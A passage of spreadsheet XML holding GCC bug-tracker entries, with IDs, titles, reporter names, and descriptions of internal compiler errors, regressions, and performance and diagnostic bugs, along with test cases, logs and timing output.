    <t>gruel</t>
  </si>
  <si>
    <t>GCC-16112</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with statement expression in return statement</t>
  </si>
  <si>
    <t>Hi Jason
your patch
  http://gcc.gnu.org/ml/gcc-cvs/2004-06/msg00737.html
broke the following testcase (inspired by PR 11295) on mainline:
========================================
struct A
{
    A()
}
A foo() { return ({ A() }) }
========================================
Compiling this with g++ -c I get:
bug.cc: In function `A foo()':
bug.cc:11: internal compiler error: in gimplify_expr at gimplify.c:3452
Please submit a full bug report [etc.]
Could you please have a look?</t>
  </si>
  <si>
    <t>GCC-79300</t>
  </si>
  <si>
    <t>Wrong diagnostics position</t>
  </si>
  <si>
    <t>Let's consider following test-case:
$ cat memtable.cc
#include 
void
a ()
{
  long val_size
  unsigned long encoded_len
  char *buf *p
  assert ((p + val_size) - buf == encoded_len)
}
$ g++ memtable.cc -Wsign-compare -c
In file included from memtable.cc:1:0:
memtable.cc: In function â€˜void a()â€™:
memtable.cc:8:32: warning: comparison between signed and unsigned integer expressions [-Wsign-compare]
   assert ((p + val_size) - buf == encoded_len)
           ~~~~~~~~~~~~~~~~~~~~~^~~~
Tilda line ends after the first letter of 'encoded_len' which is wrong.</t>
  </si>
  <si>
    <t>GCC-60975</t>
  </si>
  <si>
    <t>-Wvariadic-macros does not print warning</t>
  </si>
  <si>
    <t>bilbotheelffriend</t>
  </si>
  <si>
    <t>GCC-12113</t>
  </si>
  <si>
    <t>[tree-ssa] wrong result for comparison</t>
  </si>
  <si>
    <t>[where can I see the definition of the avove triplet items?]
In the following program the second printf() should print 'if=1'
but prints 'if=0'.
Compile options -v -g -O0
The problem was first seen about a week ago in cvs. Full details in
the run log below.
==================================================
eyal@e7:~$ cat /home/eyal/zz.c
#include 
#include 
#include 
static void
test (char *q)
{
        printf ('%c'\n         ((char)((*((char *)(q)+(0+24))) 
        printf (if=%d\n 'I' == ((char)((*((char *)(q)+(0+24))) 
}
int main ()
{
        char    *s = 012345678901234567890123I567890
        test (s)
        return (0)
}
==================================================
eyal@e7:~$ uname -a
Linux e7 2.4.22 #1 Tue Aug 26 08:12:56 EST 2003 i686 unknown
==================================================
eyal@e7:~$ /usr/local/gcc-mudflap/bin/i686-pc-linux-gnu-gcc-3.5-tree-ssa -v -g
-O0 -Wall -o /home/eyal/zz /home/eyal/zz.c
Reading specs from
/data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/specs
Configured with: ../gcc/configure --prefix=/usr/local/gcc-mudflap
--enable-languages=c
Thread model: posix
gcc version 3.5-tree-ssa 20030829 (merged 20030817)
 /data2/usr/local/gcc-mudflap-20030829-203101/bin/../libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/cc1 -quiet -v -iprefix /data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/ /home/eyal/zz.c -quiet -dumpbase zz.c -mtune=pentiumpro -auxbase zz -g -O0 -Wall -version -o /tmp/cc1uYL6H.s
ignoring nonexistent directory
/data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../i686-pc-linux-gnu/include
ignoring duplicate directory
/usr/local/gcc-mudflap/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/include
ignoring nonexistent directory
/usr/local/gcc-mudflap/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/include
 /usr/local/include
 /usr/local/gcc-mudflap/include
 /usr/include
End of search list.
GNU C version 3.5-tree-ssa 20030829 (merged 20030817) (i686-pc-linux-gnu)
        compiled by GNU C version 3.5-tree-ssa 20030829 (merged 20030817).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64574
 as -V -Qy -o /tmp/ccKFH6io.o /tmp/cc1uYL6H.s
GNU assembler version 2.12.90.0.1 (i386-linux) using BFD version 2.12.90.0.1
20020307 Debian/GNU Linux
 /data2/usr/local/gcc-mudflap-20030829-203101/bin/../libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o /home/eyal/zz /usr/lib/crt1.o /usr/lib/crti.o /data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/crtbegin.o -L/data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa -L/data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc -L/usr/local/gcc-mudflap/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa -L/data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../.. -L/usr/local/gcc-mudflap/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../.. /tmp/ccKFH6io.o -lgcc -lgcc_eh -lc -lgcc -lgcc_eh /data2/usr/local/gcc-mudflap-20030829-203101/bin/../lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/crtend.o /usr/lib/crtn.o
============================================
eyal@e7:~$ /home/eyal/zz
'I'
if=0
============================================</t>
  </si>
  <si>
    <t>GCC-63437</t>
  </si>
  <si>
    <t>[4.9/5 regression][C++14] Parenthesized movable but not copyable object doesn't compile in return statement</t>
  </si>
  <si>
    <t>After GCC 4.9 parenthesized movable but not copyable object doesn't compile in return statement under C++14 mode (C++11 mode does compile).
I'm not sure that the behavior was changed in C++14 spec Clang seems compile under both of C++11/14 mode.
example:
----
struct X // movable but not copyable
{
    X() = default
    X(X 
    X(const X 
}
X non_parenthesized()
{
    X x
    return x // works
}
X parenthesized()
{
    X x
    return (x) // error: use of deleted function 'X::X(const X&amp;)'
}
----
Online compiler results:
- GCC 4.8.2
 - C++11 http://melpon.org/wandbox/permlink/lRR60fvDgKfqd0UZ
 - C++14 http://melpon.org/wandbox/permlink/BAdrBmEG3euQLnqv
- GCC 4.9.1
 - C++11 http://melpon.org/wandbox/permlink/XllfUNu0VV0mnYsu
 - C++14 http://melpon.org/wandbox/permlink/qm67F6vODyADgKvQ (fail)
- GCC 5.0 20141001
 - C++11 http://melpon.org/wandbox/permlink/21bPbcuXB7S87DUG
 - C++14 http://melpon.org/wandbox/permlink/da8AeqX7HrS17T2n (fail)
- Clang 3.5.0
 - C++11 http://melpon.org/wandbox/permlink/VqgnlKRTOBHd5IDt
 - C++14 http://melpon.org/wandbox/permlink/tAkgLiaD50nOMtEz</t>
  </si>
  <si>
    <t>flast</t>
  </si>
  <si>
    <t>GCC-78634</t>
  </si>
  <si>
    <t>[7 Regression] 30% performance drop after r242832.</t>
  </si>
  <si>
    <t>Created attachment 40215
test-case to reproduce
We noticed a huge performance regression on x86 for one important benchmark (the reproduced for which is attached). It is caused by additional if-conversion which can be seen in ce2 dump:
IF-THEN-ELSE-JOIN block found pass 1 test 12 then 13 else 14 join 15
scanning new insn with uid = 163.
scanning new insn with uid = 164.
scanning new insn with uid = 165.
scanning new insn with uid = 166.
scanning new insn with uid = 167.
scanning new insn with uid = 168.
scanning new insn with uid = 169.
if-conversion succeeded through noce_try_cmove_arith
deleting insn with uid = 85.
deleting block 14
Removing jump 78.
deleting insn with uid = 78.
deleting insn with uid = 80.
deleting block 13
Merging block 15 into block 12...
changing bb of uid 87
changing bb of uid 88
  from 15 to 12
changing bb of uid 89
  from 15 to 12
Merged blocks 12 and 15.
Conversion succeeded on pass 1.
On AVX2 machine we see:
time ./test1.1124.exe   // build by compiler before r242832.                           
real    0m0.577s
user    0m0.575s
sys     0m0.002s
time ./test1.1125.exe  // build by compiler after r242832.                           
real    0m0.888s
user    0m0.886s
sys     0m0.001s
It is sufficient to compile it with -Ofast option to reproduce on x86.</t>
  </si>
  <si>
    <t>ysrumyan</t>
  </si>
  <si>
    <t>GCC-33508</t>
  </si>
  <si>
    <t>[4.3 Regression] tree struct aliasing goes into a loop marking call clobbers.</t>
  </si>
  <si>
    <t>Using head from today to build a telecom stack on the ARM port.
It spends nearly 100% of time in tree call clobbering for a particularly nasty testcase which I am attaching. 
Almost every time I do a Ctrl-C in gdb I hit myself in the function set_initial_properties with a similar backtrace.  
. #0  0x0847f0da in var_ann (t=0xb6f433c8)
    at ../../gnu/gcc/tree-flow-inline.h:204
#1  0x0847eee5 in mark_call_clobbered (var=0xb6f433c8 escape_type=256)
    at ../../gnu/gcc/tree-flow-inline.h:878
#2  0x08480ce6 in set_initial_properties (ai=0x8a8b280)
    at ../../gnu/gcc/tree-ssa-alias.c:565
#3  0x08481198 in compute_call_clobbered (ai=0x8a8b280)
    at ../../gnu/gcc/tree-ssa-alias.c:619
in the hunk 
  if (TREE_CODE (alias) == STRUCT_FIELD_TAG)
    {
      subvar_t svars
      svars = get_subvars_for_var (SFT_PARENT_VAR (alias))
      for ( svars svars = svars-&gt;next)
if (!unmodifiable_var_p (alias))
  mark_call_clobbered (svars-&gt;var pi-&gt;escape_mask)
    }
  else if (!unmodifiable_var_p (alias))
    mark_call_clobbered (alias pi-&gt;escape_mask)
I tried by reverting the patch from r127629 but that didn't help straight off. Doing a binary search I got to the versions r127831-37 :
r127831 is the last revision of the tree that builds this testcase without any compile time regressions. 
r127836 is the first revision of the tree where this goes awry with a huge compile time regression . 
versions (r127832-35) do not build for undeclared references to forbidden_auto_inc_dec_classes in regclass.c. I haven't yet seen what's gone into these commits to make any informed decisions. 
This is the statistic with the 
  garbage collection    :   0.43 ( 0%) usr   0.03 ( 0%) sys   4.51 ( 0%) wall       0 kB ( 0%) ggc
callgraph construction:   0.01 ( 0%) usr   0.00 ( 0%) sys   0.05 ( 0%) wall      69 kB ( 0%) ggc
callgraph optimization:   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall      51 kB ( 0%) ggc
ipa type escape       :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
cfg cleanup           :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       2 kB ( 0%) ggc
CFG verifier          :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.04 ( 0%) wall       0 kB ( 0%) ggc
trivially dead code   :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
df live regs          :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
df live&amp;initialized regs:   0.02 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall       0 kB ( 0%) ggc
df use-def / def-use chains:   0.00 ( 0%) usr   0.01 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
df reg dead/unused notes:   0.02 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall      19 kB ( 0%) ggc
register information  :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall       0 kB ( 0%) ggc
alias analysis        :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall      88 kB ( 0%) ggc
preprocessing         :   0.13 ( 0%) usr   0.04 ( 0%) sys   0.19 ( 0%) wall    1636 kB ( 4%) ggc
lexical analysis      :   0.05 ( 0%) usr   0.10 ( 1%) sys   0.09 ( 0%) wall       0 kB ( 0%) ggc
parser                :   0.22 ( 0%) usr   0.09 ( 1%) sys   0.39 ( 0%) wall    7237 kB (19%) ggc
inline heuristics     :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.18 ( 0%) wall     325 kB ( 1%) ggc
integration           :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall      91 kB ( 0%) ggc
tree CFG cleanup      :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall       3 kB ( 0%) ggc
tree VRP              :   0.04 ( 0%) usr   0.00 ( 0%) sys   1.11 ( 0%) wall     338 kB ( 1%) ggc
tree copy propagation :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.07 ( 0%) wall      20 kB ( 0%) ggc
tree PTA              :   0.06 ( 0%) usr   0.00 ( 0%) sys   0.11 ( 0%) wall     123 kB ( 0%) ggc
tree alias analysis   :   0.53 ( 0%) usr   0.00 ( 0%) sys   1.27 ( 0%) wall      23 kB ( 0%) ggc
tree call clobbering  :3604.47 (100%) usr  12.38 (95%) sys4166.01 (99%) wall       0 kB ( 0%) ggc
tree flow sensitive alias:   0.01 ( 0%) usr   0.00 ( 0%) sys   0.04 ( 0%) wall     150 kB ( 0%) ggc
tree flow insensitive alias:   0.54 ( 0%) usr   0.00 ( 0%) sys   0.73 ( 0%) wall       0 kB ( 0%) ggc
tree memory partitioning:   1.91 ( 0%) usr   0.04 ( 0%) sys   3.32 ( 0%) wall       2 kB ( 0%) ggc
tree SSA rewrite      :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.27 ( 0%) wall     338 kB ( 1%) ggc
tree SSA incremental  :   0.21 ( 0%) usr   0.00 ( 0%) sys   0.30 ( 0%) wall      17 kB ( 0%) ggc
tree operand scan     :   1.96 ( 0%) usr   0.04 ( 0%) sys   4.16 ( 0%) wall     507 kB ( 1%) ggc
dominator optimization:   0.58 ( 0%) usr   0.00 ( 0%) sys   0.78 ( 0%) wall     234 kB ( 1%) ggc
tree SRA              :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.12 ( 0%) wall       1 kB ( 0%) ggc
tree CCP              :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.04 ( 0%) wall      17 kB ( 0%) ggc
tree reassociation    :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.17 ( 0%) wall      11 kB ( 0%) ggc
tree PRE              :   0.15 ( 0%) usr   0.00 ( 0%) sys   0.23 ( 0%) wall     192 kB ( 1%) ggc
tree FRE              :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.42 ( 0%) wall     113 kB ( 0%) ggc
tree code sinking     :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.18 ( 0%) wall       5 kB ( 0%) ggc
tree forward propagate:   0.00 ( 0%) usr   0.00 ( 0%) sys   0.07 ( 0%) wall      40 kB ( 0%) ggc
tree conservative DCE :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
tree loop bounds      :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       4 kB ( 0%) ggc
tree iv optimization  :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall      38 kB ( 0%) ggc
tree loop init        :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.08 ( 0%) wall      12 kB ( 0%) ggc
tree SSA to normal    :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.52 ( 0%) wall      31 kB ( 0%) ggc
tree SSA verifier     :   4.07 ( 0%) usr   0.27 ( 2%) sys   5.43 ( 0%) wall      99 kB ( 0%) ggc
tree STMT verifier    :   0.18 ( 0%) usr   0.00 ( 0%) sys   0.22 ( 0%) wall       0 kB ( 0%) ggc
dominance computation :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall       0 kB ( 0%) ggc
expand                :   0.96 ( 0%) usr   0.06 ( 0%) sys   9.88 ( 0%) wall   25260 kB (66%) ggc
forward prop          :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall      32 kB ( 0%) ggc
CSE                   :   0.06 ( 0%) usr   0.01 ( 0%) sys   0.46 ( 0%) wall      18 kB ( 0%) ggc
dead code elimination :   0.00 ( 0%) usr   0.01 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
dead store elim1      :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.10 ( 0%) wall      17 kB ( 0%) ggc
dead store elim2      :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall      24 kB ( 0%) ggc
loop analysis         :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall      15 kB ( 0%) ggc
CPROP 1               :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall      15 kB ( 0%) ggc
PRE                   :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.14 ( 0%) wall       6 kB ( 0%) ggc
CPROP 2               :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.11 ( 0%) wall      15 kB ( 0%) ggc
bypass jumps          :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall      14 kB ( 0%) ggc
auto inc dec          :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       7 kB ( 0%) ggc
CSE 2                 :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.07 ( 0%) wall       8 kB ( 0%) ggc
combiner              :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.38 ( 0%) wall      37 kB ( 0%) ggc
regmove               :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.04 ( 0%) wall       2 kB ( 0%) ggc
scheduling            :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.24 ( 0%) wall      39 kB ( 0%) ggc
local alloc           :   0.06 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall      98 kB ( 0%) ggc
global alloc          :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.26 ( 0%) wall      35 kB ( 0%) ggc
reload CSE regs       :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.13 ( 0%) wall      52 kB ( 0%) ggc
thread pro- &amp; epilogue:   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall      34 kB ( 0%) ggc
peephole 2            :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall       0 kB ( 0%) ggc
rename registers      :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall       0 kB ( 0%) ggc
scheduling 2          :   0.07 ( 0%) usr   0.00 ( 0%) sys   0.10 ( 0%) wall       7 kB ( 0%) ggc
machine dep reorg     :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall       4 kB ( 0%) ggc
final                 :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.74 ( 0%) wall       0 kB ( 0%) ggc
symout                :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.22 ( 0%) wall       0 kB ( 0%) ggc
TOTAL                 :3617.35            13.09          4205.33              38504 kB</t>
  </si>
  <si>
    <t>ramana.radhakrishnan</t>
  </si>
  <si>
    <t>GCC-13661</t>
  </si>
  <si>
    <t>Internal compiler error in c_expand_expr at c-common.c:3714</t>
  </si>
  <si>
    <t>----- end part of error message ----
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichStuff.tcc:
In static member function `static double Lester::RichStuff&lt;Mode
mode&gt;::totalLogProb(const Lester::RichParams&amp; const
Lester::Data&amp; const Lester::Alterations&amp;) [with
Mode = Lester::Rich2Configuration const Mode&amp;mode =
Lester::globalRich2Configuration]':
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/MyRichMetropolisSampler.h:60:
  instantiated from `double Lester::MyRichMetropolisSampler&lt;Mode
mode&gt;::logTargetDistribution(Lester::RichSpace::PointType&amp;) const
[with Mode = Lester::Rich2Configuration const Mode&amp;mode =
Lester::globalRich2Configuration]'
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MarkovChainSampler/MarkovChainSampler.h:30:
  instantiated from here
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichStuff.tcc:68:
Internal compiler error in c_expand_expr at c-common.c:3714
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
-------------------------------------------------
On my computer (pccn) with the following snippets of configuration ... 
pccn:cmt&gt; ldd `which g++`
        libc.so.6 =&gt; /lib/libc.so.6 (0x4002c000) 
        /lib/ld-linux.so.2 =&gt; /lib/ld-linux.so.2 (0x40000000)
pccn:cmt&gt; which g++
/usr/local/bin/g++
pccn:cmt&gt; g++ --version
g++ (GCC) 3.2.3
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
pccn:lester&gt; uname -a
Linux pccn 2.4.20-24.7.cb1 #1 Thu Dec 18 16:18:47 GMT 2003 i686 unknown
... I find that ...
g++ -c /tmp/pps.c++ -g -Df2cFortran -fPIC -shared -D_GNU_SOURCE -Dlinux -Dunix
-pipe -ansi -Wall -W -pthread -pedantic -D_GNU_SOURCE
... produces the output reported below which ends in the internal compiler error
reported at the top of this message.  Note that the code (/tmp/pps.c++) being
compiled PROBABLY SHOULD NOT COMPILE: it was in a mid-debug state when the error
below was reported.  I expect the code to constitute bad input.  Nevertheless
I report the internal compiler error it in case this is of any use to anyone. 
Note also that only the last 13 lines of the output reproduced below are
important.  All the earlier lines containing messages about warning: style of
line directive is a GCC extension were not produced by the compiler (with the
same options) until I generated the pre-processed file that is to be bundled
with this error report (if I figure out how).  These earlier lines seem to be a
consequence of the way I have produced the pre-processed file and are
(presumably) unrelated to the final internal compiler error message ....
-------- full output of above command -----------
/tmp/pps.c++:1:3: warning: style of line directive is a GCC extension
../src/test/MarkovTest.cpp:1:3: warning: style of line directive is a GCC extension
:1:3: warning: style of line directive is a GCC extension
:1:3: warning: style of line directive is a GCC extension
../src/test/MarkovTest.cpp:2:3: warning: style of line directive is a GCC extension
In file included from ../src/test/MarkovTest.cpp:2:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4:3:
warning: style of line directive is a GCC extension
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4
                 from ../src/test/MarkovTest.cpp:2:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MathsConstants/MathsConstants.h:5:3:
warning: style of line directive is a GCC extension
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MathsConstants/MathsConstants.h:5
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4
                 from ../src/test/MarkovTest.cpp:2:
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:1:3: warning:
style of line directive is a GCC extension
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:22:3:
warning: style of line directive is a GCC extension
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:23:3:
warning: style of line directive is a GCC extension
In file included from
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:23
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MathsConstants/MathsConstants.h:5
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4
                 from ../src/test/MarkovTest.cpp:2:
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_sys.h:1:3: warning:
style of line directive is a GCC extension
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_sys.h:61:3: warning:
style of line directive is a GCC extension 
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MathsConstants/MathsConstants.h:5
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4
                 from ../src/test/MarkovTest.cpp:2:
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:24:3:
warning: style of line directive is a GCC extension
In file included from
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:24
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MathsConstants/MathsConstants.h:5
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4
                 from ../src/test/MarkovTest.cpp:2:
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_machine.h:5:3:
warning: style of line directive is a GCC extension 
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_machine.h:6:3:
warning: style of line directive is a GCC extension
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_machine.h:7:3:
warning: style of line directive is a GCC extension
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MathsConstants/MathsConstants.h:5
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4
                 from ../src/test/MarkovTest.cpp:2:
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:25:3:
warning: style of line directive is a GCC extension
In file included from
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_math.h:25
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MathsConstants/MathsConstants.h:5
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Constants.h:4
                 from ../src/test/MarkovTest.cpp:2:
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_precision.h:1:3:
warning: style of line directive is a GCC extension
/afs/cern.ch/sw/packages/GSL/1.4/rh73_gcc32/include/gsl/gsl_precision.h:24:3:
warning: style of line directive is a GCC extension
[ ----------- snip ------------]
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichMarkovRingFinder.h:181
                 from ../src/test/MarkovTest.cpp:25:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichMarkovRingFinder.tcc:272:3:
warning: style of line directive is a GCC extension
In file included from ../src/test/MarkovTest.cpp:25:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichMarkovRingFinder.h:182:3:
warning: style of line directive is a GCC extension
../src/test/MarkovTest.cpp:26:3: warning: style of line directive is a GCC extension
In file included from ../src/test/MarkovTest.cpp:26:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Rich2Configuration.h:4:3:
warning: style of line directive is a GCC extension
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Rich2Configuration.h:4
                 from ../src/test/MarkovTest.cpp:26:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichConfiguration.h:4:3:
warning: style of line directive is a GCC extension
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichConfiguration.h:4
                 from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Rich2Configuration.h:4
                 from ../src/test/MarkovTest.cpp:26:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Configuration.h:1:3:
warning: style of line directive is a GCC extension
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Configuration.h:21:3:
warning: style of line directive is a GCC extension
In file included from
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Rich2Configuration.h:4
                 from ../src/test/MarkovTest.cpp:26:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichConfiguration.h:14:3:
warning: style of line directive is a GCC extension
In file included from ../src/test/MarkovTest.cpp:26:
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/Rich2Configuration.h:14:3:
warning: style of line directive is a GCC extension
../src/test/MarkovTest.cpp:84:3: warning: style of line directive is a GCC extension
../src/test/MarkovTest.cpp:179:3: warning: style of line directive is a GCC
extension
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichStuff.tcc:
In
   static member function `static double Lester::RichStuff&lt;Mode 
   mode&gt;::totalLogProb(const Lester::RichParams&amp; const 
   Lester::Data&amp; const Lester::Alterations&amp;) [with 
   Mode = Lester::Rich2Configuration const Mode&amp;mode =
   Lester::globalRich2Configuration]':
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/MyRichMetropolisSampler.h:60:
  instantiated from `double Lester::MyRichMetropolisSampler&lt;Mode
mode&gt;::logTargetDistribution(Lester::RichSpace::PointType&amp;) const
[with Mode = Lester::Rich2Configuration const Mode&amp;mode =
Lester::globalRich2Configuration]'
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/MarkovChainSampler/MarkovChainSampler.h:30:
  instantiated from here
/var/pcce/usera/lester/mycmt/Rich/RichMarkovRingFinder/v1r0/src/finder/RichStuff.tcc:68:
Internal
   compiler error in c_expand_expr at c-common.c:3714
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
-----------------------------------------------</t>
  </si>
  <si>
    <t>cgl20</t>
  </si>
  <si>
    <t>GCC-25443</t>
  </si>
  <si>
    <t>-fpic/-fPIC failure in gcc.dg/tree-ssa/loop-3.c</t>
  </si>
  <si>
    <t>I'm getting a 4.1/mainline failure in gcc.dg/tree-ssa/loop-3.c on x86_64 and i686:
http://gcc.gnu.org/ml/gcc-testresults/2005-12/msg00892.html
